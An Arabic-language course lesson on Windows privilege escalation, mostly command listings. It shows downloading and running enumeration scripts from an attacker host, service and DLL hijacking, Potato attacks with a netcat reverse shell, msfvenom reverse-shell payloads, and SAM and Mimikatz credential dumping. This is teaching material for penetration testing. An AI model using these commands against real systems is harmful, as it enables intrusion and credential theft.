ما بعد الاستغلال وتصعيد الصلاحيات
تصعيد الصلاحيات في Windows
5 دقيقة للقراءة
تصعيد الصلاحيات في Windows يتطلب فهم آليات أمان Windows. يغطي هذا الدرس التقنيات الأساسية للحصول على وصول SYSTEM أو Administrator.
نصوص الاستطلاع
WinPEAS
# التحميل والتشغيل
certutil -urlcache -split -f http://attacker-ip/winPEASx64.exe winpeas.exe
.\winpeas.exe
# أو من الذاكرة
IEX(New-Object Net.WebClient).DownloadString('http://attacker-ip/winPEAS.bat')
PowerUp
# الاستيراد والتشغيل
Import-Module .\PowerUp.ps1
Invoke-AllChecks
# من الذاكرة
IEX(New-Object Net.WebClient).DownloadString('http://attacker-ip/PowerUp.ps1')
Invoke-AllChecks
Windows Exploit Suggester
# على جهاز المهاجم
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt
الاستطلاع اليدوي
معلومات النظام
# إصدار OS
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
# اسم المضيف
hostname
# المستخدم الحالي والمجموعات
whoami
whoami /priv
whoami /groups
net user %username%
المستخدمون والمجموعات
# قائمة المستخدمين
net user
net localgroup
# المسؤولون
net localgroup administrators
# معلومات النطاق
net user /domain
net group /domain
معلومات الشبكة
ipconfig /all
route print
netstat -ano
arp -a
تقنيات تصعيد الصلاحيات
1. إعدادات الخدمة الخاطئة
مسارات الخدمة غير المقتبسة:
# إيجاد المسارات غير المقتبسة
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"
# إذا كان المسار: C:\Program Files\My Service\service.exe
# أنشئ: C:\Program.exe (يعمل كمستخدم الخدمة)
صلاحيات الخدمة الضعيفة:
# فحص صلاحيات الخدمة
accesschk64.exe -uwcqv "Everyone" *
accesschk64.exe -uwcqv "Authenticated Users" *
# إذا كان قابلاً للكتابة، استبدل ثنائي الخدمة
sc qc vulnerable_service
sc config vulnerable_service binpath= "C:\temp\shell.exe"
sc stop vulnerable_service
sc start vulnerable_service
ثنائي الخدمة قابل للكتابة:
# فحص الصلاحيات على ملف الخدمة التنفيذي
icacls "C:\path\to\service.exe"
# إذا كان قابلاً للكتابة، استبدل بثنائي خبيث
move "C:\path\to\service.exe" "C:\path\to\service.exe.bak"
copy C:\temp\shell.exe "C:\path\to\service.exe"
sc stop service_name
sc start service_name
2. صلاحيات الرموز
فحص الصلاحيات الحالية:
whoami /priv
SeImpersonatePrivilege (هجمات Potato):
# باستخدام JuicyPotato (Windows Server 2016/2019)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\shell.exe" -t *
# باستخدام PrintSpoofer (Windows 10/Server 2019)
PrintSpoofer.exe -i -c cmd
# باستخدام GodPotato (عالمي)
GodPotato.exe -cmd "nc.exe -e cmd.exe attacker-ip 4444"
SeBackupPrivilege:
# نسخ SAM و SYSTEM
reg save hklm\sam C:\temp\sam
reg save hklm\system C:\temp\system
# استخراج الهاشات بدون اتصال مع secretsdump
impacket-secretsdump -sam sam -system system LOCAL
3. AlwaysInstallElevated
# فحص السجل
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# إذا أعادا كلاهما 1، أنشئ MSI خبيث
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker-ip LPORT=4444 -f msi -o shell.msi
# تثبيت MSI
msiexec /quiet /qn /i shell.msi
4. المهام المجدولة
# قائمة المهام المجدولة
schtasks /query /fo LIST /v
# فحص نصوص المهام القابلة للكتابة
icacls "C:\path\to\scheduled\script.bat"
# إذا كان قابلاً للكتابة، عدّل لتضمين reverse shell
5. اختطاف DLL
# إيجاد DLLs المفقودة
# استخدم Process Monitor لتحديد ترتيب بحث DLL
# إنشاء DLL خبيث
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker-ip LPORT=4444 -f dll -o malicious.dll
# ضعه في مسار بحث DLL
6. AutoRuns
# فحص ملفات AutoRun التنفيذية
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# فحص الصلاحيات على ثنائيات AutoRun
icacls "C:\path\to\autorun.exe"
7. بيانات الاعتماد المخزنة
# بيانات الاعتماد المحفوظة
cmdkey /list
# إذا وُجدت بيانات اعتماد، استخدم runas
runas /savecred /user:DOMAIN\Administrator "cmd.exe /c whoami > C:\temp\output.txt"
# البحث عن كلمات مرور في الملفات
findstr /si password *.txt *.ini *.config *.xml
# المواقع الشائعة
type C:\Windows\Panther\Unattend.xml
type C:\Windows\System32\sysprep\sysprep.xml
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
8. ثغرات Kernel
# فحص إصدار Windows
systeminfo
# الثغرات الملحوظة:
# MS16-032 (Windows 7/8/10، Server 2008/2012)
# MS15-051 (Windows 7، Server 2008)
# PrintNightmare (CVE-2021-34527)
استخراج كلمات المرور
قاعدة بيانات SAM
# من CMD مرتفع
reg save hklm\sam C:\temp\sam
reg save hklm\system C:\temp\system
# النقل والاستخراج مع Impacket
impacket-secretsdump -sam sam -system system LOCAL
Mimikatz
# التشغيل بصلاحيات admin
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
منهجية تصعيد الصلاحيات
1. تشغيل WinPEAS/PowerUp
2. فحص whoami /priv لصلاحيات الرموز
3. البحث عن مسارات خدمة غير مقتبسة
4. فحص صلاحيات الخدمة
5. البحث عن AlwaysInstallElevated
6. فحص المهام المجدولة
7. البحث عن بيانات اعتماد مخزنة
8. فحص صلاحيات AutoRuns
9. البحث عن ملفات حساسة
10. فحص إصدار kernel للثغرات
مرجع سريع
# استطلاع أساسي
systeminfo
whoami /all
net user
net localgroup administrators
# الخدمات
sc query
wmic service get name,pathname
# صلاحيات الرموز
whoami /priv
# المهام المجدولة
schtasks /query /fo LIST /v
# سجل AutoRuns
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# بيانات اعتماد محفوظة
cmdkey /list
في الدرس التالي، سنغطي تقنيات ما بعد الاستغلال والثبات. :::